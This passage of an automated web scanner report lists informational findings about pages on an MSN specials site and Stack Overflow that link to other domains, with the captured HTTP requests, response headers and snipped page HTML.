</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&form=msnhal"><strong>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne&form=msnhal">Avril Lavigne</a> (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=avril+lavigne&qpvt=avril+lavigne&FORM=msnhal">see photos</a>) is the first celebrity death hoax of 2011. The rocker is rumored to have died in a freak accident. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&form=msnhal">Get the details</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.334. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/TV/Reality-show-and-housewives.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx?cp-documentid=27237519&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Real+Housewives+of+Atlanta&form=msnhal
http://www.bing.com/search?q=Reality+show+and+housewives&form=msnhal
http://www.bing.com/search?q=basketball+wives+and+football+wives+shows&form=msnhal
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=reality+tv+stars+and+where+are+they+now&form=msnhal
http://www.bing.com/search?q=scripted+and+reality+tv+shows&form=msnhal
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406719&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FTV%2FReality-show-and-housewives.aspx%3Fcp-documentid%3D27237519%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/TV/Reality-show-and-housewives.aspx?cp-documentid=27237519&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fe7758719542440cb7a593ba7fed7eab; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FEF45778E4A3484FB7C43D6E672C73BA; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:39 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406719&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FTV%2FReality-show-and-housewives.aspx%3Fcp-documentid%3D27237519%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Reality+show+and+housewives&form=msnhal"><strong>
...[SNIP]...
<div>From "<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Real+Housewives+of+Atlanta&form=msnhal">The Real Housewives of Atlanta</a>" and "New York City" to shows about the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=basketball+wives+and+football+wives+shows&form=msnhal">wives of sports stars</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=scripted+and+reality+tv+shows&form=msnhal">Some shows use scripts</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=reality+tv+stars+and+where+are+they+now&form=msnhal">Where are some reality stars now?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.335. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/TV/Reality-show-and-housewives.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx?cp-documentid=27237519&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Real+Housewives+of+Atlanta&form=msnhal
http://www.bing.com/search?q=Reality+show+and+housewives&form=msnhal
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=basketball+wives+and+football+wives+shows&form=msnhal
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=reality+tv+stars+and+where+are+they+now&form=msnhal
http://www.bing.com/search?q=scripted+and+reality+tv+shows&form=msnhal
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345090&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FTV%2FReality-show-and-housewives.aspx%3Fcp-documentid%3D27237519%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=478206409c4041c1abf72a8225e69257; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=838D8B011B6C4F18B57F68D2634EBD5A; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345090&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FTV%2FReality-show-and-housewives.aspx%3Fcp-documentid%3D27237519%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Reality+show+and+housewives&form=msnhal"><strong>
...[SNIP]...
<div>From "<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Real+Housewives+of+Atlanta&form=msnhal">The Real Housewives of Atlanta</a>" and "New York City" to shows about the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=basketball+wives+and+football+wives+shows&form=msnhal">wives of sports stars</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=scripted+and+reality+tv+shows&form=msnhal">Some shows use scripts</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=reality+tv+stars+and+where+are+they+now&form=msnhal">Where are some reality stars now?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.336. http://specials.redacted/IEIncreaseFont_preview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/IEIncreaseFont_preview.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/IEIncreaseFont_preview.aspx?cp-documentid=9149805&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345055&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FIEIncreaseFont_preview.aspx%3Fcp-documentid%3D9149805%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /IEIncreaseFont_preview.aspx?cp-documentid=9149805&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=59eaa5d4bf3c4cbfbaf9ae34ffb0980c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=07E0779BA6B64CAF972165E63DC53F53; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:55 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345055&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FIEIncreaseFont_preview.aspx%3Fcp-documentid%3D9149805%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.337. http://specials.redacted/IEIncreaseFont_preview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/IEIncreaseFont_preview.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/IEIncreaseFont_preview.aspx?cp-documentid=9149805&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406665&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FIEIncreaseFont_preview.aspx%3Fcp-documentid%3D9149805%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a90e4750539843a7bda27290d63ad314; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=3EFF066D045744A5A98A6B5FAA662925; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406665&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FIEIncreaseFont_preview.aspx%3Fcp-documentid%3D9149805%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.338. http://sstatic.net/Js/wmd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/Js/wmd.js

Issue detail

The page was loaded from a URL containing a query string:

http://sstatic.net/Js/wmd.js?v=508538fa9757

The response contains the following links to other domains:

http://i.imgur.com/GKc7H.png
http://imgur.com/
http://www.google.com/search?q=free+image+hosting

Request

Response

22.339. http://stackoverflow.com/users/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/users/login

Issue detail

The page was loaded from a URL containing a query string:

http://stackoverflow.com/users/login?returnurl=%2fusers

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://apple.stackexchange.com/
http://area51.stackexchange.com/
http://askubuntu.com/
http://cooking.stackexchange.com/
http://creativecommons.org/licenses/by-sa/2.5/
http://cstheory.stackexchange.com/
http://data.stackexchange.com/
http://edge.quantserve.com/quant.js
http://engine.adzerk.net/redirect/0/2776/2751/0/4de3c60f719c4dfcb1a57531c7050090/0
http://english.stackexchange.com/
http://gamedev.stackexchange.com/
http://gaming.stackexchange.com/
http://itc.conversationsnetwork.org/series/stackoverflow.html
http://math.stackexchange.com/
http://openid.net/get/
http://openid.net/what/
http://photo.stackexchange.com/
http://pixel.quantserve.com/pixel/p-c1rF4kxgLUzNc.gif
http://programmers.stackexchange.com/
http://serverfault.com/
http://sstatic.net/Js/third-party/openid-jquery.js?v=7
http://sstatic.net/js/master.min.js?v=e8eb0725b4bd
http://sstatic.net/openid.css?v=3
http://sstatic.net/stackoverflow/all.css?v=90776b57f91f
http://sstatic.net/stackoverflow/img/apple-touch-icon.png
http://sstatic.net/stackoverflow/img/favicon.ico
http://stackapps.com/
http://stackexchange.com/
http://stats.stackexchange.com/
http://superuser.com/
http://tex.stackexchange.com/
http://unix.stackexchange.com/
